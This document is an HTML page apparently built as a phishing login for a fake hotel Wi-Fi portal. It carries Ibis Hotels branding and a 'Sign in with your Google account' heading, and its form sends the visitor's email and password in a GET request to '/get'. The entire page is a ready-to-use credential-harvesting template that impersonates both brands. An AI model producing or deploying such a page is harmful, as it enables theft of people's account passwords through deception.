<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.ibishotels-name {
  font-size: 42px;
  color: #000000;
  margin-left: 10px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #e20026;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #e20026;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
}

.submit-btn:hover {
  background: #FFC72C;
}



</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
  <svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="65.000000pt" height="65.000000pt" viewBox="0 0 800.000000 800.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,800.000000) scale(0.100000,-0.100000)"
fill="#e20026
" stroke="none">
<path d="M1380 6622 c-35 -34 -40 -46 -40 -83 0 -24 12 -78 25 -119 81 -242
213 -911 260 -1317 65 -560 73 -1390 19 -2013 -36 -420 -163 -1129 -261 -1448
-45 -147 -51 -196 -29 -237 36 -66 107 -81 212 -44 225 78 918 216 1328 264
355 41 539 49 1106 49 566 0 754 -8 1106 -49 405 -48 1073 -179 1314 -260 41
-13 95 -25 119 -25 37 0 49 5 83 40 38 38 40 42 35 92 -2 29 -21 108 -41 175
-87 291 -210 954 -250 1348 -34 334 -41 497 -41 1005 0 597 17 886 76 1295 52
367 176 959 239 1139 35 103 22 173 -40 210 -39 22 -92 20 -180 -9 -241 -81
-909 -212 -1314 -260 -349 -40 -541 -49 -1096 -50 -540 0 -682 6 -1020 40
-410 43 -1063 165 -1348 252 -64 20 -141 38 -170 40 -50 5 -54 3 -92 -35z
m1256 -1525 c23 -27 24 -35 24 -163 l0 -134 -149 0 c-135 0 -151 2 -175 21
-26 20 -26 21 -26 165 l0 145 151 -3 151 -3 24 -28z m583 22 c17 -6 36 -19 41
-29 6 -11 10 -137 10 -304 l0 -286 47 36 c95 73 187 104 308 104 196 0 330
-80 410 -243 69 -142 97 -342 77 -554 -24 -250 -108 -418 -259 -519 -180 -119
-505 -144 -816 -62 -130 34 -117 -74 -117 969 l0 899 134 0 c73 0 147 -5 165
-11z m1390 0 c17 -6 36 -19 41 -29 6 -10 10 -80 10 -154 l0 -136 -150 0 c-147
0 -152 1 -175 25 -24 23 -25 29 -25 165 l0 140 134 0 c73 0 147 -5 165 -11z
m987 -527 c40 -11 77 -23 84 -27 26 -16 40 -75 40 -166 l0 -92 -32 6 c-18 3
-67 13 -108 23 -103 23 -275 24 -316 2 -39 -21 -53 -38 -59 -74 -12 -60 18
-85 217 -182 244 -120 313 -186 352 -337 63 -239 -64 -444 -317 -512 -120 -33
-410 -16 -521 31 -51 21 -66 62 -66 176 0 49 3 90 8 90 4 0 54 -9 111 -20 298
-58 451 -26 451 94 0 73 -37 106 -215 191 -170 82 -255 142 -302 212 -94 143
-81 357 31 480 41 46 129 96 207 118 77 22 337 14 435 -13z m-2989 8 c17 -6
35 -22 42 -36 8 -18 11 -212 11 -680 l0 -655 -156 3 c-150 3 -157 4 -175 27
-18 22 -19 49 -19 687 l0 664 134 0 c73 0 147 -5 163 -10z m2034 -19 c18 -22
19 -49 19 -688 l0 -664 -156 3 c-150 3 -157 4 -175 27 -18 22 -19 49 -19 688
l0 664 156 -3 c150 -3 157 -4 175 -27z"/>
<path d="M3404 4326 c-28 -14 -69 -42 -92 -62 l-42 -36 0 -363 0 -363 44 -11
c25 -6 82 -11 128 -11 183 0 270 93 298 317 28 218 -24 462 -112 525 -51 36
-156 38 -224 4z"/>
</g>
</svg>


    <div class="ibishotels-name">Ibis Hotels</div>
  </div>

  <div class="form-container">

    <center><h1>Sign in with your Google account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">Continue</button>

    </form>

  </div>

</div>

</body>
</html>
